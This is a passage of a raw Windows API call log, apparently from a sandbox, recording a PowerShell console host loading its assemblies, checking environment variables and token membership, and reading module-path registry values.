out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.577] GetLastError () returned 0xcb [0134.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24e1dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0134.723] GetLastError () returned 0x2 [0134.723] SetErrorMode (uMode=0x1) returned 0x1 [0134.724] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24e684 | out: lpFileInformation=0x24e684*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.724] GetLastError () returned 0x2 [0134.724] SetErrorMode (uMode=0x1) returned 0x1 [0135.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e298, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.184] GetLastError () returned 0x0 [0135.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.184] GetLastError () returned 0x0 [0135.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.185] GetLastError () returned 0x0 [0135.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.187] GetLastError () returned 0xcb [0135.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.204] GetLastError () returned 0xcb [0135.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.204] GetLastError () returned 0xcb [0135.229] CoCreateGuid (in: pguid=0x24e764 | out: pguid=0x24e764*(Data1=0x1629a22f, Data2=0x3e01, Data3=0x4149, Data4=([0]=0x9a, [1]=0x52, [2]=0xa9, [3]=0x9b, [4]=0x4d, [5]=0x1a, [6]=0x3, [7]=0x6f))) returned 0x0 [0135.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.237] GetLastError () returned 0xcb [0135.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.239] GetLastError () returned 0xcb [0135.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.240] GetLastError () returned 0xcb [0135.252] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0135.252] GetLastError () returned 0x0 [0135.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24e644 | out: lpConsoleScreenBufferInfo=0x24e644) returned 1 [0135.253] GetLastError () returned 0x0 [0135.257] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0135.258] GetLastError () returned 0x0 [0135.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24e644 | out: lpConsoleScreenBufferInfo=0x24e644) returned 1 [0135.258] GetLastError () returned 0x0 [0135.258] GetVersionExW (in: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0135.258] GetLastError () returned 0x0 [0135.259] GetCurrentProcess () returned 0xffffffff [0135.259] GetLastError () returned 0x3f0 [0135.260] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24e654 | out: TokenHandle=0x24e654*=0x344) returned 1 [0135.260] GetLastError () returned 0x3f0 [0135.264] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24e6ac | out: TokenInformation=0x0, ReturnLength=0x24e6ac) returned 0 [0135.264] GetLastError () returned 0x7a [0135.265] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x369878 [0135.265] GetLastError () returned 0x7a [0135.265] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x369878, TokenInformationLength=0x4, ReturnLength=0x24e6ac | out: TokenInformation=0x369878, ReturnLength=0x24e6ac) returned 1 [0135.265] GetLastError () returned 0x7a [0135.267] DuplicateTokenEx (in: hExistingToken=0x344, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24e664 | out: phNewToken=0x24e664*=0x33c) returned 1 [0135.267] GetLastError () returned 0x7f [0135.268] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24e6ac | out: TokenInformation=0x0, ReturnLength=0x24e6ac) returned 0 [0135.268] GetLastError () returned 0x7a [0135.268] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x369858 [0135.268] GetLastError () returned 0x7a [0135.268] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x369858, TokenInformationLength=0x4, ReturnLength=0x24e6ac | out: TokenInformation=0x369858, ReturnLength=0x24e6ac) returned 1 [0135.268] GetLastError () returned 0x7a [0135.269] CheckTokenMembership (in: TokenHandle=0x33c, SidToCheck=0x2bd4ce0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24e640 | out: IsMember=0x24e640) returned 1 [0135.269] GetLastError () returned 0x7a [0135.269] CloseHandle (hObject=0x33c) returned 1 [0135.269] GetLastError () returned 0x7a [0135.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.269] GetLastError () returned 0x7a [0135.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.269] GetLastError () returned 0x7a [0135.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.269] GetLastError () returned 0x7a [0135.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.269] GetLastError () returned 0x7a [0135.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.311] GetLastError () returned 0x7a [0135.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.311] GetLastError () returned 0x7a [0135.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.311] GetLastError () returned 0x7a [0135.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.311] GetLastError () returned 0x7a [0135.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.311] GetLastError () returned 0x7a [0135.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.311] GetLastError () returned 0x7a [0135.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.312] GetLastError () returned 0x7a [0135.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.312] GetLastError () returned 0x7a [0135.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.312] GetLastError () returned 0x7a [0135.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.312] GetLastError () returned 0x7a [0135.436] SetConsoleCtrlHandler (HandlerRoutine=0x2af384a, Add=1) returned 1 [0135.436] GetLastError () returned 0x7a [0135.543] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c [0135.543] GetLastError () returned 0x0 [0135.546] CoCreateGuid (in: pguid=0x24e678 | out: pguid=0x24e678*(Data1=0xd17d4a5a, Data2=0xec4c, Data3=0x485b, Data4=([0]=0xb8, [1]=0x3f, [2]=0xdb, [3]=0x2b, [4]=0x6b, [5]=0x4b, [6]=0xc3, [7]=0xbf))) returned 0x0 [0135.819] WinSqmIsOptedIn () returned 0x0 [0135.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.820] GetLastError () returned 0xcb [0135.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.829] GetLastError () returned 0xcb [0135.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.830] GetLastError () returned 0xcb [0135.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.832] GetLastError () returned 0xcb [0135.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.833] GetLastError () returned 0xcb [0135.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.847] GetLastError () returned 0xcb [0135.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.847] GetLastError () returned 0xcb [0135.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.848] GetLastError () returned 0xcb [0135.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.850] GetLastError () returned 0xcb [0135.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.887] GetLastError () returned 0xcb [0135.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.890] GetLastError () returned 0xcb [0135.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.890] GetLastError () returned 0xcb [0138.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.234] GetLastError () returned 0xcb [0138.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.234] GetLastError () returned 0xcb [0138.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.234] GetLastError () returned 0xcb [0138.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.234] GetLastError () returned 0xcb [0138.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.438] GetLastError () returned 0x3 [0138.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.438] GetLastError () returned 0x3 [0138.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.438] GetLastError () returned 0x3 [0138.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.439] GetLastError () returned 0x3 [0138.473] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x69 [0138.473] GetLastError () returned 0x3 [0138.548] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338390, nSize=0x64 | out: lpDst="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modu") returned 0x6a [0138.548] GetLastError () returned 0x3 [0138.549] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338390, nSize=0x6a | out: lpDst="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x6a [0138.549] GetLastError () returned 0x3 [0138.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e490 | out: phkResult=0x24e490*=0x348) returned 0x0 [0138.549] RegQueryValueExW (in: hKey=0x348, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24e4d4, lpData=0x0, lpcbData=0x24e4d0*=0x0 | out: lpType=0x24e4d4*=0x2, lpData=0x0, lpcbData=0x24e4d0*=0x6c) returned 0x0 [0138.555] RegQueryValueExW (in: hKey=0x348, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24e4d4, lpData=0x338390, lpcbData=0x24e4d0*=0x6c | out: lpType=0x24e4d4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24e4d0*=0x6c) returned 0x0 [0138.555] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x338390, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0138.555] GetLastError () returned 0x3 [0138.555] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0138.555] GetLastError () returned 0x3 [0138.556] RegCloseKey (hKey=0x348) returned 0x0 [0138.556] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x338390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0138.556] GetLastError () returned 0x3 [0138.556] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e490 | out: phkResult=0x24e490*=0x348) returned 0x0 [0138.556] 